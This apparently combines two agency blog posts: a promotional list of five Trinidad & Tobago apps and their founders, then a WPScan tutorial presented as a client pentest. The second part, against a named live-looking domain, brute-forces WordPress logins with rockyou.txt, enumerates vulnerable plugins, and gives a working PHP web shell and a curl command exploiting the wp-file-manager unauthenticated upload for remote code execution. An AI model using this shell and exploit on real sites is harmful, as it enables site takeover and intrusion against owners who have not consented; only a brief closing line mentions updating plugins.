Trinidad & Tobago’s Tech Revolution: 5 Game-Changing Apps Built by Local Entrepreneurs

Think All the Best Apps Come from Silicon Valley? Think Again!

When we think of tech innovation, our minds often go straight to Silicon Valley, but groundbreaking ideas aren’t exclusive to California! Right here in Trinidad & Tobago, local tech entrepreneurs are building cutting-edge platforms that are transforming the way we live, work, and do business. From ride-sharing to food delivery, ticketing platforms, and even cryptocurrency services, these homegrown solutions prove that T&T is a rising force in the tech world. Let’s dive into some of the most exciting digital ventures coming out of our twin-island nation!

1. RideShare – A Trini Alternative to Uber

Founded by Dwight Housend, RideShare is a locally developed transportation app designed to make getting around easier and more accessible for Trinis. With a user-friendly interface and a growing network of drivers, RideShare provides a safe and efficient alternative to traditional taxis, helping commuters navigate the island with ease. Whether you need a ride to work, the airport, or a night out, RideShare has got you covered! Check them out here.

2. Island E Tickets – The Future of Event Ticketing

Love attending concerts, fetes, and other live events? Kwesi Hopkinson created Island E Tickets, an online ticketing platform that makes buying and selling event tickets seamless. No more long lines or last-minute ticket hunts—this digital solution ensures that partygoers can secure their spots at the hottest events with just a few clicks. Organizers also benefit from a hassle-free way to sell and manage ticket sales efficiently. Check them out here.

3. Food Drop – Bringing Your Favorite Meals to You

If you’re a foodie, you’ll love Food Drop, the brainchild of Jade Piper. This food delivery app connects hungry customers with their favorite restaurants, offering a fast and reliable way to get meals delivered straight to their doors. With a diverse range of cuisine options and an easy-to-use interface, Food Drop is revolutionizing food delivery in T&T, making it more convenient than ever to satisfy your cravings. Check them out here.

4. Sunshine – Buy Crypto USD with TT Dollars

In the fast-evolving world of cryptocurrency, Jarryon Paul has made it easier than ever for Trinis to purchase USDT securely and hassle-free. His platform, Sunshine, allows users to convert Trinidad & Tobago dollars into USDT (Tether), bridging the gap between local currency and global digital assets. As crypto adoption grows in the Caribbean, Sunshine is paving the way for a more inclusive financial ecosystem. Check them out here.

5. LEOTT – The Ultimate Business Directory for T&T

Need to find a business fast? Leonard Reyes developed LEOTT, a local online business directory that functions as T&T’s very own Yellow Pages. Whether you’re looking for a plumber, a salon, or a marketing agency, LEOTT helps users discover and connect with businesses quickly and easily. It’s a must-have tool for anyone searching for reliable services across the country. Check them out here.

The Future of Tech in T&T is Bright!

These platforms are just a glimpse of the incredible innovation happening in our local tech scene. As more entrepreneurs take bold steps in digital transformation, Trinidad & Tobago is proving that world-class technology doesn’t have to come from Silicon Valley—it can thrive right here at home!

Want to stay updated on the latest breakthroughs in local tech? Sign up for our newsletter for exclusive insights and success stories. If you have a game-changing idea and need help bringing it to life, send us a DM or visit hexakodeagency.com—let’s make it happen!

WPScan: The Ultimate WordPress Security Scanner for Detecting Vulnerabilities

WordPress powers over 40% of the web, making it a prime target for hackers. If you’re serious about security, you need tools that can proactively identify weaknesses before attackers exploit them. That’s where WPScan comes in—a powerful, open-source security scanner designed specifically for WordPress. Whether you’re a developer, site owner, or security enthusiast, WPScan helps uncover vulnerabilities in plugins, themes, and core files, ensuring your site stays protected. In this post, we’ll explore what WPScan is, how it works, and why it’s an essential tool for safeguarding your WordPress site.

In this blog, we are going to pentest a wordpress site belonging to one of our clients. You can find the site here.

To use WPScan, you can either start a VM with Kali Linux running or you can download it for Mac/Windows here. You will also need to sign up (it’s free) and obtain an api key from there. Once you have WPScan on your system and youur api key you can begin penetration testing.

Let’s start the test by enumerating the users on the wordpress website and checking for any weak passwords. You can download this text file called rockyou.txt, which is a list of commonly used passwords across the internet.

Open up your terminal in the same directory as the rockyou.txt file and type 

wpscan --url https://locsexotica.com --passwords rockyou.txt

It will run for a few seconds, bruteforcing each password inside rockyou.txt against each user detected by WPScan until it finds a match.

In our case, after a few seconds, we see that it found a match with the username obvioususer and password123 (very weak password). If we go to the login page of our site, we see that we can indeed login with these credentials and gain Contributor level access.

Next lets try searching for any vulnerable plugins on the site. To do this, grab your api key from WPScan and enter the following in your terminal

wpscan --url https://locsexotica.com -e vp --api-token <YOUR-API-TOKEN>

-e means enumerate and vp stands for vulnerable plugins. Run this command and wait a few seconds.

After a few minutes, we see a bunch of vulnerabilities found with links on how to exploit them. Most interesting is Unauthenticated Arbitrary File Upload leading to RCE. You read more about the exploit here. It basically means that we can submit a file via post request to https://example.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php and the file would actually be uploaded to the website! This can lead to remote code execution and potentially a hacker can take over your entire site. Let’s try it in our case. To do this let’s create a php file called shell.php

<?php
echo "Hacked by WPScan!";
// Execute system commands
if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Now, lets use curl to submit the post request with the required fields

curl -i -X POST "https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php" -F "cmd=upload" -F "target=l1_Lw" -F "upload[]=@shell.php"

After running the above, we see the following being output into the terminal

This response means we have successfully uploaded a file to the wordpress website while being unauthenticated. Now if we go to https://locsexotica.com/wp-content/plugins/wp-file-manager/lib/files/shell.php we see

Thus our hack is successful. To prevent these types of hacks from happening, we should regularly update our plugins. Join our newsletter for a free Website security audit!